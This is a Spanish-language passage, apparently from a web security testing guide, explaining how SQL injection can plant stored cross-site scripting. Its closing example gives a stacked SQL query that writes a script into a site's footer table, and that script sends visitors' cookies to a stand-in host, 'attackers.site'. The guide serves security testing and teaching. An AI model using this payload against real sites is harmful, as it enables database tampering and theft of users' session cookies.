Generalmente, este conjunto de ejemplos se apoyan en ataques XSS explotando una vulnerabilidad de inyeccion SQL. La primera prueba a hacer es si el site objetivo tiene una vulnerabilidad de inyeccion SQL. Estas se describen en la seccion 4.2 Comprobacion de inyeccion SQL. Para cada vulnerabilidad de inyeccion SQL, hay un conjunto de restricciones que delimitan las peticiones que el atacante o persona probando puede realizar. Quien realiza las pruebas debe ajustar los ataques XSS que ha ideado con las entradas que puede insertar. 1. De modo similar al anterior ejemplo XSS, utiliza un campo de pagina web vulnerable a incidencias de inyeccion SQL para cambiar un valor en la base de datos que seria utilizado por la aplicacion como entrada a ser mostrada en el site sin el filtrado adecuado (esta seria una combinacion de inyeccion SQL y XSS). Por ejemplo, vamos a suponer que hay una tabla de pie de pagina en la base de datos con todos los pies de pagina para el site, incluyendo un campo notice con el aviso legal que aparece al final de cada pagina web. Podrias emplear la siguiente consulta para inyectar codigo javascript al campo notice en la tabla footer de la base de datos. SELECT field1, field2, field3 FROM table_x WHERE field2 = 'x'; UPDATE footer SET notice = 'Copyright 1999-2030%20 <script>document.write(\'<img src="http://attackers.site/cv.jpg?\'+document.cookie+\'">\')</script>' WHERE notice = 'Copyright 1999-2030';